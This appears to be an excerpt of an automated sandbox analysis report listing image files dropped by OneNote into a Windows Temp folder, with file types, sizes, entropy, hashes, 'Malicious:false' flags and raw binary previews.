                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7D4C1916-BC36-4500-BC83-ABCAACD12199}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):25622
                                                                                                                                                                                                                  Entropy (8bit):7.058784902089801
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
                                                                                                                                                                                                                  MD5:F8CCFC24DEB1D991EBE085E1B2D7D9BF
                                                                                                                                                                                                                  SHA1:AF76C22A765434AEDA134924C517C84107F4FED5
                                                                                                                                                                                                                  SHA-256:7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
                                                                                                                                                                                                                  SHA-512:818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q*.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..|..n.....6.*...f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf..*....z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.)*.e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7D8911E6-D68C-46E1-BA24-9C634A6568D8}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7DA03EB5-159B-43A7-8248-CFA0B4BA1407}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7DA3047B-7EDE-4C76-A03F-F268DC268846}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7EFEEB39-D30D-4ED2-B8CA-4FA86AD08688}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):40884
                                                                                                                                                                                                                  Entropy (8bit):7.545929039957292
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
                                                                                                                                                                                                                  MD5:7379775A1E2AB7FAB95CFFCE01AE05F3
                                                                                                                                                                                                                  SHA1:3D3DDFD8AC7E07203561BAE423D66F0806833AB3
                                                                                                                                                                                                                  SHA-256:9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
                                                                                                                                                                                                                  SHA-512:4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7F1B60AF-3E62-47E1-9E96-B62D57D6FDB2}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7FF02078-47E2-4FE3-9003-6C9D28A8A672}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                  Entropy (8bit):7.974776104184905
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                                  MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                                  SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                                  SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                                  SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{7FF6D6D8-4169-4584-BCF5-8D75261B7005}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):53259
                                                                                                                                                                                                                  Entropy (8bit):7.651662052139301
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
                                                                                                                                                                                                                  MD5:2EE369ABB7936F8C28FF0ABDD224EA05
                                                                                                                                                                                                                  SHA1:FE9D304A7B49E31EAE439369ABC548E265149636
                                                                                                                                                                                                                  SHA-256:FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
                                                                                                                                                                                                                  SHA-512:5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}.*.a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{|>..MN=:....Q[..H....a........|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u...*.p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{81D964BF-D056-4156-92B3-6A07CCA8E432}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:12:29], progressive, precision 8, 598x766, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):70028
                                                                                                                                                                                                                  Entropy (8bit):7.742089280742944
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:ub4bgbB7g9cKCmSzaNF0jAdAzQKTEFBQqUp/i0yG1pidLHTVX:ub4bIB7Qg2OjbzjgWp/i0yGCZx
                                                                                                                                                                                                                  MD5:EC7811912ACA47F6AEB912469761D70D
                                                                                                                                                                                                                  SHA1:C759BC2D908705D599B03BDB366C951B11F99A4E
                                                                                                                                                                                                                  SHA-256:FBB4573E3BEE1B337077691BEBAE15D6FAC52432405D31396D526D7694A8283D
                                                                                                                                                                                                                  SHA-512:881828150993A8C56E36CDA2051D89C1F6E0322643902C9506392C163E8734A2933A46486F40E5BC8C8D0164E180605E52620EF22FE14540AEA787A38B22E98E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H.....7Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:12:29.............................V.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................}.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....H.yM..? .Z.. .^.x..p.8.A...K.... .\{..)..y....t..=.^y)..v.@.W>. .h.. ..p.:.\)(.$....$.I).....!....E..Z.....&.5.).

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8253796E-C8D4-4475-A188-F6CE7C016502}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{832ED68C-5D36-4C80-A673-0D8DB8BA4448}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1924
                                                                                                                                                                                                                  Entropy (8bit):7.836744258175623
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                                  MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                                  SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                                  SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                                  SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{8494FB7B-3275-4AB1-9189-B0A85C74D14E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4847
                                                                                                                                                                                                                  Entropy (8bit):7.950192613458318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                                  MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                                  SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                                  SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                                  SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                                  Malicious:false
